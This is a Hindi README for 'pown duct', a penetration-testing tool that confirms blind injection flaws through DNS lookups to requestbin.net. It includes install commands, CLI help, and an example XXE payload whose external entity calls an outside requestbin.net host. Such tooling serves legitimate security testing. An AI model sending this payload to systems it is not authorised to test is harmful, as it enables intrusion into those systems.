
अंध इंजेक्शन हमलों का पता लगाने के लिए आवश्यक उपकरण।
DNS साइड-चैनलों का उपयोग करके ब्लाइंड इंजेक्शन हमलों का पता लगाने के लिए आवश्यक उपकरण।
यह उपकरण secapps.com ओपन-सोर्स पहल का हिस्सा है।
___ ___ ___ _ ___ ___ ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
नोट: यह उपकरण http://requestbin.net सेवा का लाभ उठा रहा है। भविष्य के संस्करण एक समर्पित, कस्टम-निर्मित बुनियादी ढांचे का उपयोग करेंगे।
यह उपकरण Pown.js के भाग के रूप में उपयोग किए जाने के लिए है, लेकिन इसे एक स्वतंत्र उपकरण के रूप में अलग से भी चलाया जा सकता है।
पहले हमेशा की तरह Pown स्थापित करें:
$ npm install -g pown@latest
सीधे Pown से लागू करें:
$ pown duct
अन्यथा, इसे अपने प्रोजेक्ट के रूट से स्थानीय रूप से स्थापित करें:
$ npm install @pown/duct --save
एक बार हो जाने के बाद, pown cli लागू करें:
$ ./node_modules/.bin/pown-cli duct
आप वैश्विक pown का उपयोग करके भी उपकरण को स्थानीय रूप से लागू कर सकते हैं:
$ POWN_ROOT=. pown duct
pown duct <command>
Side-channel attack enabler
Commands:
pown duct dns DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
pown duct dnspown duct dns
DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restore channel [string]
--output Output format [string] [choices: "string", "hexdump", "json"] [default: "string"]
ऐसे मामले होते हैं जब हमें SQL इंजेक्शन, XSS, XXE या SSRF जैसे हमले करने की आवश्यकता होती है, लेकिन लक्ष्य अनुप्रयोग यह संकेत नहीं दे रहा है कि यह असुरक्षित है। यह सुनिश्चित करने का एक तरीका कि कोई भेद्यता मौजूद है, एक मान्य हमला वेक्टर इंजेक्ट करने का प्रयास करना है जो DNS रिज़ॉल्वर को एक नियंत्रित डोमेन के लिए पूछने के लिए मजबूर करता है। यदि रिज़ॉल्यूशन सफल होता है, तो हमले को सफल माना जाएगा।
नोट: आप Burp Collaborator से परिचित हो सकते हैं जो ग्राहकों के लिए एक समान सेवा प्रदान करता है।
पहले, हमें हल करने के लिए एक डिस्पोजेबल DNS नाम की आवश्यकता है:
$ pown duct dns
screenshot
प्रदान किए गए DNS का उपयोग करके, अपना पेलोड तैयार करें। उदाहरण के लिए, निम्नलिखित एक DNS रिज़ॉल्यूशन को ट्रिगर कर सकता है यदि कोई XXE भेद्यता मौजूद है।
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
यदि हमला सफल रहा, तो हमें टर्मिनल में एक संदेश प्राप्त होगा।
screenshot